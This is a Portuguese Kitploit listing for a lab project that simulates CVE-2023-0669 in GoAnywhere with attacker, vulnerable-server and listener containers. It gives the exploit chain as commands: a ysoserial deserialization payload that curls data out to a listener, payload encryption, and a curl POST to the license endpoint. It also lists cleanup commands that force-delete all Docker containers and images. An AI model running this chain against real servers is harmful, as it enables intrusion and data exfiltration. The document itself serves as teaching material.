Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2023-0669-simulation — Ambiente de simulação para CVE-2023-0669 com contêineres Docker de atacante, servidor vulnerável e listener. Demonstra geração de exploit de desserialização, criptografia de payload e exfiltração de dados. | Kitploit
Ferramentas/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosComando e Controle
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

Ambiente de simulação para CVE-2023-0669 com contêineres Docker de atacante, servidor vulnerável e listener. Demonstra geração de exploit de desserialização, criptografia de payload e exfiltração de dados.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
7há 8 mesesAinda não revisado
Compartilhar

Estrutura do projeto

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← criado automaticamente (exfiltração)

2. Inicie os 3 contêineres (atacante, vulnerável, listener)

docker-compose up --build

Problema: erro KeyError: 'ContainerConfig' ao executar docker compose up

este projeto requer:

  • Docker Engine: v24 ou v25 no mínimo
  • Docker Compose: v2.20+ (incluído automaticamente com o Docker) KeyError: 'ContainerConfig' ao executar docker compose up Isso geralmente provém de metadados Docker desatualizados ou corrompidos, ou de imagens antigas. Remova os contêineres, imagens e metadados quebrados:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

Em seguida, reconstrua corretamente:

docker compose build --no-cache

docker compose up

3. Entre no contêiner do atacante

docker exec -it attacker bash

Geração do payload seguro (apenas envia uma mensagem)```

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

Criptografia do payload

java CVE_2023_0669_helper payload.ser 1

→ Copie toda a longa string que é exibida (Ctrl+A e depois Ctrl+C)

Envio do exploit (substitua LA_CHAINE pelo que você acabou de copiar)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. Resultado imediato

Você verá nos logs do listener (ou na pasta ./received no seu PC):

PWNED! Recebidos 42 bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...

Baixar ferramenta